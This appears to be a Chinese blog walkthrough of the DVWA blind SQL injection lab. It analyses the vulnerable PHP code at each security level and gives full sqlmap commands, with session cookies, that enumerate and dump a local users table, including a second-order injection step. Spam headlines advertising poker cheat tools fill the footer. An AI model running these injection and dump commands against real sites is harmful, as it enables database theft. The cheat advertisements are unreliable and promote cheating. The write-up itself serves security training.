【DVWA】20. SQL Injection (Blind)SQL注入盲注(全等级Sqlmap版)
创始人
2025-01-16 05:05:51
0

文章目录

  • 0. 盲注介绍
    • 0.1 布尔盲注
    • 0.2 时间盲注
    • 0.3 常用函数
      • if()
      • length()
      • substr()、substring()
      • ascii()、ord()
  • 1. Low
    • 1.1 源码分析
    • 1.2 实操
  • 2. Medium
    • 2.1 源码分析
    • 2.2 实操
  • 3. High
    • 3.1 源码分析
    • 3.2 实操
  • 4. Impossible
    • 4.1 源码分析

0. 盲注介绍

盲注,有两种主要类型,包括布尔盲注和时间盲注

0.1 布尔盲注

核心是判断回显正确与否。布尔即页面有回显,但不显示具体内容,只有登陆成功和登录失败这两种情况,显示语句是否正常执行。布尔盲注的步骤是首先使用length()判断查询结果的长度,然后使用substr()截取每一个字符,并穷举出字符内容。
常用的函数还有sleep()和if()

0.2 时间盲注

通过注入特定语句,根据对页面请求的物理反馈,判断是否注入成功,比如在SQL语句当中使用sleep()函数加载网页的时间来判断注入点,适用场景是无法从显示页面上互殴去执行结果的情况。

0.3 常用函数

if()

功能:条件判断。
语法格式:if(expr1,expr2,expr3):expr1
为true则返回expr2,expr1为false则返回 expr3。
注: 仅MySQL支持if(expr1,expr2,expr3)。

length()

功能:返回字符串的长度,以字节为单位。
语法格式:length(str)

substr()、substring()

功能:从指定的位置开始,截取字符串指定长度的子串。
语法格式:substr(str,pos)或substr(str,pos,len),substring(str,pos)或substring(str,pos,len)
参数说明
lstr:要提取子串的字符串。
lpos:提取子串的开始位置。
len:指定要提取的子串的长度

ascii()、ord()

功能:返回字符串最左边字符的ASCII码值。
语法格式:ascii(str),ord(str)
延时函数sleep()
功能:让语句延迟执行一段时间,执行成功后返回0。
语法格式:sleep(N),即延迟执行N秒。

1. Low

1.1 源码分析

     // Get input     $id = $_GET[ 'id' ];      // Check database     $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";     $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors      // Get results     $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors     if( $num > 0 ) {         // Feedback for end user         echo '
User ID exists in the database.
'; } else { // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); // Feedback for end user echo '
User ID is MISSING from the database.
'; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); } ?>

这段PHP代码直接将用户输入(通过$_GET[‘id’]获取)拼接到了SQL查询语句中,而没有进行任何形式的验证或转义。

即变量 i d 直接从 id直接从 id直接从_GET全局数组中获取,然后在查询语句中未经处理直接使用:

在这里插入图片描述
如果攻击者在请求的URL当中传递了恶意的id参数,将导致查询条件总是为真,可能会返回所有用户的信息,从而泄露敏感数据
回显也有问题,返回结果只有两种,user id exiets in the database和user id is missing from the database。
在这里插入图片描述

1.2 实操

在这里插入图片描述
输入1之后点击submit抓包
在这里插入图片描述
获取到URL和Cookie信息

Referer: http://localhost:8081/dvwa/vulnerabilities/sqli_blind/ Cookie: security=low; PHPSESSID=aho8tb4mqkidn6k8bao7vlq5u9 

然后构建sqlmap语句

sqlmap –u “http://localhost:8081/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=” security=low; PHPSESSID=aho8tb4mqkidn6k8bao7vlq5u9” --batch 

sqlmap的-batch参数是一个非交互式模式,它允许sqlmap在不需要用户干预的情况下运行。当使用-batch参数时,sqlmap会自动使用默认设置执行操作,而不会在每一步中询问用户的选择。这对于自动化任务或批处理操作特别有用,因为它可以避免脚本执行过程中的任何停顿。
这将指示sqlmap自动进行测试,而不会提示用户输入额外的信息或确认。这个参数非常适合在你已经知道目标参数并希望快速完成测试时使用

在这里插入图片描述
可以看到sqlmap给出结果,当前网站存在布尔盲注和时间盲注和报错三种情况
在这里插入图片描述
于是继续使用工具爆库名

sqlmap –u “http://localhost:8081/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=” security=low; PHPSESSID=aho8tb4mqkidn6k8bao7vlq5u9” --batch --dbs 

看到有如下八个表
在这里插入图片描述
随后指定数据库获取表名
我们这里指定dvwa数据库

python sqlmap.py -u “http://localhost:8081/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=” security=low; PHPSESSID=aho8tb4mqkidn6k8bao7vlq5u9” --batch -D dvwa --tables 

在这里插入图片描述
看到有两个表,我们继续指定表users获取更多属性信息

python sqlmap.py -u “http://localhost:8081/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=” security=low; PHPSESSID=aho8tb4mqkidn6k8bao7vlq5u9” --batch -D dvwa -T users --columns 

在这里插入图片描述
我们看到了user_id和password
于是我们查看这两个属性的内容并解密

python sqlmap.py -u “http://localhost:8081/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=” security=low; PHPSESSID=aho8tb4mqkidn6k8bao7vlq5u9” --batch -D dvwa -T users --dump 

在这里插入图片描述可以看到所有信息都dump下来了,我们也可以指定只看id和password

python sqlmap.py -u “http://localhost:8081/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=” security=low; PHPSESSID=aho8tb4mqkidn6k8bao7vlq5u9” --batch -D dvwa -T users -C user,password -dump 

这样显示的就只有两列了
在这里插入图片描述

2. Medium

2.1 源码分析

     // Check Anti-CSRF token     checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );      // Get input     $id = $_GET[ 'id' ];      // Was a number entered?     if(is_numeric( $id )) {         // Check the database         $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );         $data->bindParam( ':id', $id, PDO::PARAM_INT );         $data->execute();          // Get results         if( $data->rowCount() == 1 ) {             // Feedback for end user             echo '
User ID exists in the database.
'; } else { // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); // Feedback for end user echo '
User ID is MISSING from the database.
'; } } } // Generate Anti-CSRF token generateSessionToken(); ?>

输入只接受选择了,回显还是那两个,使用bp抓包进行了

2.2 实操

可以看到不接受用户输入了只能选择
在这里插入图片描述
选择1进行抓包
在这里插入图片描述
获取URL和Cookie

/dvwa/vulnerabilities/sqli_blind/ HTTP/1.1 id=1&Submit=Submit security=medium; PHPSESSID=aho8tb4mqkidn6k8bao7vlq5u9 

仍然按照low的思路进行

python sqlmap.py –u “http://localhost:8081/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=” security=medium; PHPSESSID=aho8tb4mqkidn6k8bao7vlq5u9” --batch 

还是存在盲注漏洞
在这里插入图片描述

python sqlmap.py –u “http://localhost:8081/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=” security=medium; PHPSESSID=aho8tb4mqkidn6k8bao7vlq5u9” --batch --dbs 

在这里插入图片描述

python sqlmap.py –u “http://localhost:8081/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=” security=medium; PHPSESSID=aho8tb4mqkidn6k8bao7vlq5u9” --batch -D dvwa --tables 

在这里插入图片描述

python sqlmap.py –u “http://localhost:8081/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=” security=medium; PHPSESSID=aho8tb4mqkidn6k8bao7vlq5u9” --batch -D dvwa -T users --columns 

在这里插入图片描述

python sqlmap.py –u “http://localhost:8081/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=” security=medium; PHPSESSID=aho8tb4mqkidn6k8bao7vlq5u9” --batch -D dvwa -T users -C user,password -dump 

在这里插入图片描述

3. High

3.1 源码分析

     // Get input     $id = $_COOKIE[ 'id' ];      // Check database     $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";     $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors      // Get results     $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors     if( $num > 0 ) {         // Feedback for end user         echo '
User ID exists in the database.
'; } else { // Might sleep a random amount if( rand( 0, 5 ) == 3 ) { sleep( rand( 2, 4 ) ); } // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); // Feedback for end user echo '
User ID is MISSING from the database.
'; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); } ?>

限制了输出行数为一行,而且失败时 当他随机生成的数等于3就会随机休眠2-4秒,目的是干扰基于时间的盲注
在这里插入图片描述
在SQL查询语句中添加了LIMIT 1,以此控制只输入一个结果;虽然添加了LIMIT 1,但是我们可以通过#将其注释掉
在这里插入图片描述

3.2 实操

在这里插入图片描述这次注意,填写信息是新的页面
请求窗口和响应窗口,查询数据提交的页面、查询结果显示的页面是分离成了2个不同的窗口分别控制的。即在查询提交窗口提交数据(POST请求)之后,需要到另外一个窗口进行查看结果(GET请求)

所以需要进行二阶sql注入
先抓取原始页面
在这里插入图片描述

然后抓取弹出的POST请求
在这里插入图片描述
随后构造我们的sqlmap语句

python sqlmap.py –u “http://localhost:8081/dvwa/vulnerabilities/sqli_blind/cookie-input.php” --data=“id=1&Submit=Submit” --second-url “http://localhost:8081/dvwa/vulnerabilities/sqli_blind/” --cookie=“id=1; security=high;  PHPSESSID=8dkm47nbfg46sppm7n1lnkbvq2” --batch 

可以看到存在如下漏洞,和Low/Medium相同
在这里插入图片描述
然后我们进行数据库的遍历

python sqlmap.py –u “http://localhost:8081/dvwa/vulnerabilities/sqli_blind/cookie-input.php” --data=“id=1&Submit=Submit” --second-url “http://localhost:8081/dvwa/vulnerabilities/sqli_blind/” --cookie=“id=1; security=high;  PHPSESSID=8dkm47nbfg46sppm7n1lnkbvq2” --batch --dbs 

在这里插入图片描述
然后进行表的遍历

python sqlmap.py –u “http://localhost:8081/dvwa/vulnerabilities/sqli_blind/cookie-input.php” --data=“id=1&Submit=Submit” --second-url “http://localhost:8081/dvwa/vulnerabilities/sqli_blind/” --cookie=“id=1; security=high;  PHPSESSID=8dkm47nbfg46sppm7n1lnkbvq2” --batch -D dvwa --tables 

在这里插入图片描述
进行列的遍历

python sqlmap.py –u “http://localhost:8081/dvwa/vulnerabilities/sqli_blind/cookie-input.php” --data=“id=1&Submit=Submit” --second-url “http://localhost:8081/dvwa/vulnerabilities/sqli_blind/” --cookie=“id=1; security=high;  PHPSESSID=8dkm47nbfg46sppm7n1lnkbvq2” --batch -D dvwa -T users --columns 

在这里插入图片描述
对用户名密码进行爆破

python sqlmap.py –u “http://localhost:8081/dvwa/vulnerabilities/sqli_blind/cookie-input.php” --data=“id=1&Submit=Submit” --second-url “http://localhost:8081/dvwa/vulnerabilities/sqli_blind/” --cookie=“id=1; security=high;  PHPSESSID=8dkm47nbfg46sppm7n1lnkbvq2” --batch -D dvwa -T users -C user,password --dump 

在这里插入图片描述

4. Impossible

4.1 源码分析

     // Check Anti-CSRF token     checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );      // Get input     $id = $_GET[ 'id' ];      // Was a number entered?     if(is_numeric( $id )) {         // Check the database         $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );         $data->bindParam( ':id', $id, PDO::PARAM_INT );         $data->execute();          // Get results         if( $data->rowCount() == 1 ) {             // Feedback for end user             echo '
User ID exists in the database.
'; } else { // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); // Feedback for end user echo '
User ID is MISSING from the database.
'; } } } // Generate Anti-CSRF token generateSessionToken(); ?>

impossible.php代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入
只有当返回的查询结果数量为一个记录时,才会成功输出,这样就有效预防了爆库
利用is_numeric($id)函数来判断输入的id是否是数字or数字字符串,满足条件才知晓query查询语句
Anti-CSRF token机制的加入了进一步提高了安全性,session_token是随机生成的动态值,每次向服务器请求,客户端都会携带最新从服务端已下发的session_token值向服务器请求作匹配验证,相互匹配才会验证通过

相关内容

热门资讯

专业讨论!德扑之星真破解套路(... 专业讨论!德扑之星真破解套路(辅助挂)软件透明挂(有挂了解)-哔哩哔哩;人气非常高,ai更新快且高清...
每日必看!智星德州菠萝外挂检测... 每日必看!智星德州菠萝外挂检测(辅助挂)软件透明挂(有挂教学)-哔哩哔哩1、玩家可以在智星德州菠萝外...
透视透明挂!轰趴十三水有后台(... 轰趴十三水有后台赢率提升策略‌;透视透明挂!轰趴十三水有后台(辅助挂)软件透明挂(有挂详情)-哔哩哔...
发现玩家!德扑ai助手软件(辅... 发现玩家!德扑ai助手软件(辅助挂)透视辅助(有挂教学)-哔哩哔哩;玩家在德扑ai助手软件中需先进行...
一分钟了解!x-poker辅助... 一分钟了解!x-poker辅助软件(辅助挂)辅助透视(有挂攻略)-哔哩哔哩1、每一步都需要思考,不同...
一分钟揭秘!德州最新辅助器(辅... 一分钟揭秘!德州最新辅助器(辅助挂)透视辅助(有挂攻略)-哔哩哔哩;德州最新辅助器最新版本免费下载安...
玩家攻略推荐!德州辅助(辅助挂... 玩家攻略推荐!德州辅助(辅助挂)辅助透视(有挂了解)-哔哩哔哩是由北京得德州辅助黑科技有限公司精心研...
揭秘真相!pokernow德州... 《揭秘真相!pokernow德州(辅助挂)辅助透视(有挂介绍)-哔哩哔哩》 pokernow德州软件...
五分钟了解!德州之星辅助器(辅... 五分钟了解!德州之星辅助器(辅助挂)辅助透视(有挂透明)-哔哩哔哩1、很好的工具软件,可以解锁游戏的...
推荐一款!pokermaste... 1、推荐一款!pokermaster有外挂(辅助挂)透视辅助(有挂教学)-哔哩哔哩;详细教程。2、p...